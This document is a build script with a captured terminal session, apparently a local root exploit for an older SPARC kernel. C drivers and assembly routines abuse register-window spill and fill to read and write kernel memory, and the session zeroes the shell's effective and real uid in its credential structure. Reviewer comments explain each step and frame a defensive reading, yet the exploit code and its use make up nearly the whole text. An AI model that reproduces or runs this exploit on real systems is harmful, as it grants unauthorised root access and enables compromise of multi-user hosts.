# Build script followed by a captured terminal session.
#
# The script writes four files through here-documents and compiles them into
# two tools:
#   ./read  ADDR        prints the 32-bit word that rdmem() returns for ADDR
#   ./write ADDR VALUE  passes ADDR and VALUE to wrmem()
# The session at the end shows an unprivileged csh using both tools on kernel
# virtual addresses (0xfc......) belonging to its own process.
#
# NOTE(review): the page names no operating-system release, hardware model or
# vendor fix. The addresses and structure offsets in the session belong to the
# one captured host and say nothing about other kernels.
#
# NOTE(review): the here-document delimiters are unquoted, so the shell applies
# parameter and command substitution to the bodies. Nothing in these bodies
# triggers substitution, which is why the files come out verbatim.

# readc.c: K&R-style driver with no #include lines and no argc check, so
# argv[1] is used even when no argument was given. strtoul(argv[1], 0, 0) picks
# the base from the prefix, which lets the session pass 0x-prefixed addresses.
cat > readc.c << _EOF_
main(argc, argv)
char *argv[];
{
printf("0x%x\n", rdmem(strtoul(argv[1], 0, 0)));
}
_EOF_

# reads.s: rdmem(addr), executed in this order:
#   1. seven `save` then seven `restore`, walking the register-window stack
#      down and back up;
#   2. the current %sp is copied to %i4 and the return address %o7 to %i7, so
#      both remain reachable as %o4 / %o7 after the next `restore`;
#   3. `btst 4, %o0` tests bit 2 of addr; `andn %o0, 7, %fp` loads %fp with
#      addr rounded down to a multiple of 8;
#   4. `restore` switches to the previous window, whose %sp is the %fp just set;
#   5. `bz,a .+12` with its annulled delay slot copies %l0 into %i0 when bit 2
#      of addr was clear, otherwise %l1;
#   6. `mov %o4, %fp` puts the saved stack pointer back, and `retl` with a
#      `restore` in the delay slot returns, leaving the chosen word in the
#      caller's %o0.
# NOTE(review): presumably the window entered in step 4 is no longer held in
# the register file, so the kernel's window-fill handling loads %l0/%l1 from
# the address in %sp without checking that it is a user address. That would be
# the kernel-side defect a fix must close; confirm against the affected kernel.
cat > reads.s << _EOF_
.globl rdmem
rdmem:
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
restore
restore
restore
restore
restore
restore
restore
mov %sp, %i4
mov %o7, %i7
btst 4, %o0
andn %o0, 7, %fp
restore
bz,a .+12
mov %l0, %i0
mov %l1, %i0
mov %o4, %fp
retl
restore
_EOF_

# writec.c: same K&R-style driver shape as readc.c. argv[1] (address) and
# argv[2] (value) are both converted with strtoul(..., 0, 0) and handed to
# wrmem(); argc is not checked and nothing is printed.
cat > writec.c << _EOF_
main(argc, argv)
char *argv[];
{
wrmem(strtoul(argv[1], 0, 0), strtoul(argv[2], 0, 0));
}
_EOF_

# writes.s: wrmem(addr, value). The opening follows rdmem, with one extra
# `mov %o1, %i1` so that value is still in %o1 after the `restore`. The
# annulled branch then stores value into %l0 (bit 2 of addr clear) or %l1
# (bit 2 set) of the window whose %sp is addr rounded down to a multiple of 8.
# A second run of seven `save` (the first one based on the saved stack pointer
# in %o4) and seven `restore` follows before %fp is put back and the routine
# returns.
# NOTE(review): presumably the second save/restore run makes the kernel's
# window-spill handling write the modified window to the address held in %sp,
# again without a user-address check. Confirm against the affected kernel.
cat > writes.s << _EOF_
.globl wrmem
wrmem:
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
restore
restore
restore
restore
restore
restore
restore
mov %o1, %i1
mov %sp, %i4
mov %o7, %i7
btst 4, %o0
andn %o0, 7, %fp
restore
bz,a .+12
mov %o1, %l0
mov %o1, %l1
save %o4, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
restore
restore
restore
restore
restore
restore
restore
mov %o4, %fp
retl
restore
_EOF_

# Plain cc builds with no special flags; the binaries need no privileges.
cc -o read readc.c reads.s
cc -o write writec.c writes.s

# ---- Captured csh session (prompt "otsuka%"); not part of the build script ----
# NOTE(review): the ADDR column of `ps -l` gives an ordinary user (UID 23384)
# the kernel address of the shell's process structure, 0xfcfd6800. The session
# reads ADDR + 0x28 to find the credential structure and then writes 0 to the
# words at offsets 0x4 and 0xc of it.
# NOTE(review): the ps header lists 14 columns while the data row has 13
# values; the spacing was lost in capture and is left as found.
# Defensive reading: the process changes its own uid fields with no setuid
# exec or authentication step. A shell whose effective uid becomes 0 without
# such an event is the observable symptom; the remedy is a kernel fix for the
# window handling, which this page does not identify.
otsuka% ps -lp $$
F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME COMD
8 S 23384 641 1145 1 20 fcfd6800 374 fcfd69c8 console 0:01 csh
# Offset 0x28 is the pointer to the shell's ucred struct.
otsuka% ./read 0xfcfd6828
0xfcfbc380
# Offsets 0x4 and 0xc in the ucred contain the effective and real uid.
otsuka% ./write 0xfcfbc384 0
otsuka% ./write 0xfcfbc38c 0
# NOTE(review): the trailing `whoami` has no prompt and no output in the
# captured page, so the transcript itself does not show the result.
whoami